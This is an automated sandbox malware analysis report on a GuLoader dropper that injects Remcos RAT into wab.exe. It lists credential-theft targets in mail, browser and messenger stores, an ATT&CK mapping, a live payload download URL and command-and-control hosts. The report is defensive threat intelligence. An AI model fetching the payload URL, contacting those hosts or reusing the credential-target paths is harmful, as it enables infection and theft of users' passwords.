              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000Jump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FD2008Jump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlawJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyjJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudrJump to behavior
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12129563335.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12062619602.0000000006B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/23 20:39:43 Program Manager]
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
              Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12129563335.0000000006B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/23 20:39:46 Program Manager]
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562933 cpuid 2_2_37562933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_37562264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,5_2_00408043
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword5_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword5_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword5_2_00402DA5
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8112, type: MEMORYSTR
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection              		1
              DLL Side-Loading              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder              		11
              Masquerading              		1
              Credentials In Files              		28
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion              		LSA Secrets131
              Security Software Discovery              		SSH11
              Clipboard Data              		Data Transfer Size Limits212
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1330791 Sample: SMGS-RCDU5010031.exe Startdate: 23/10/2023 Architecture: WINDOWS Score: 100 36 ourt2949aslumes9.duckdns.org 2->36 38 kapsnovin.com 2->38 40 geoplugin.net 2->40 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 9 other signatures 2->60 8 SMGS-RCDU5010031.exe 1 68 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 26 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 8->26 dropped 28 C:\Users\user\AppData\...\trivalente.vid, DOS 8->28 dropped 30 2 other files (none is malicious) 8->30 dropped 62 Writes to foreign memory regions 8->62 64 Maps a DLL or memory area into another process 8->64 12 wab.exe 4 17 8->12         started        signatures6 process7 dnsIp8 42 94.156.6.253, 2402, 50037, 50038 NET1-ASBG Bulgaria 12->42 44 kapsnovin.com 77.238.121.250, 50036, 80 ASIATECHIR Iran (ISLAMIC Republic Of) 12->44 46 geoplugin.net 178.237.33.50, 50039, 80 ATOM86-ASATOM86NL Netherlands 12->46 32 C:\Users\user\...tpartisystemers.exe, PE32 12->32 dropped 34 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->34 dropped 66 Maps a DLL or memory area into another process 12->66 68 Installs a global keyboard hook 12->68 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        file9 signatures10 process11 signatures12 48 Tries to steal Instant Messenger accounts or passwords 17->48 50 Tries to harvest and steal browser information (history, passwords, etc) 17->50 52 Tries to steal Mail credentials (via file / registry access) 20->52

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SMGS-RCDU5010031.exe42%ReversingLabsWin32.Trojan.Guloader

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe42%ReversingLabsWin32.Trojan.Guloader
              C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes\trivalente.vid0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsDialogs.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsExec.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://odc.offi0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpEd0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin100%Avira URL Cloudmalware
              https://go.microsoft.co0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_0%Avira URL Cloudsafe
              https://adservice.google.co.0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.bin0%Avira URL Cloudsafe
              https://contextual.med0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://odc.officeap0%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              https://2542116.fls.doub0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJ0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpmd0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpn.net/son.gpp.dll0%Avira URL Cloudsafe
              http0%Avira URL Cloudsafe
              https://eb2.3lif0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
              http://geoplugin.net/json.gphx0%Avira URL Cloudsafe
              https://2542116.fls.doubXXO0%Avira URL Cloudsafe
              https://get.a0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              https://get3.adobe0%Avira URL Cloudsafe
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html0%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.biny0%Avira URL Cloudsafe
              https://contextual.medi0%Avira URL Cloudsafe
              https://get3.adobe.co0%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown
                kapsnovin.com
                		77.238.121.250
                		truetrue
                  		unknown
                  ourt2949aslumes9.duckdns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bintrue
                    • Avira URL Cloud: malware
                    		unknown
                    httptrue
                    • Avira URL Cloud: safe
                    		low
                    http://geoplugin.net/json.gpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://2542116.fls.doublecliwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREADwab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://adservice.google.co.wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://odc.offiwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.imvu.comrwab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://eb2.3lift.com/syncwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://go.microsoft.cowab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contextual.media.net/checkwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.msn.com/de-ch/https://wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://eb2.3lift.com/sync?wab.exe, 00000004.00000003.12115362208.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://support.google.com/chrome/?p=plugin_flashwab.exe, 00000004.00000003.12124781462.00000000046D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://googleads.g.doubleclick.net/pageawab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/?ocid=iewab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.nirsoft.netwab.exe, 00000004.00000002.12129302860.000000000059B000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://geoplugin.net/json.gpEdwab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/recaptcha/api2/aframewab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/chrome/wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.comwab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/recaptcha/apiwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtwab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJwab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://odc.officeapwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.google.com/chrome/https://wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/pawab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/pagewab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://2542116.fls.doubleclick.net/activwab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.binwab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://2542116.fls.doubwab.exe, 00000004.00000003.12123400386.00000000046DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://2542116.fls.doublewab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.msn.com/https://www.msn.com/de-cwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://login.yahoo.com/config/loginwab.exefalse
                                                                		high
                                                                https://www.msn.com/de-ch/?ocid=iehpwab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://geoplugin.net/json.gpn.net/son.gpp.dllwab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.nirsoft.net/wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.imvu.comatawab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123198637.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119839410.00000000046D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
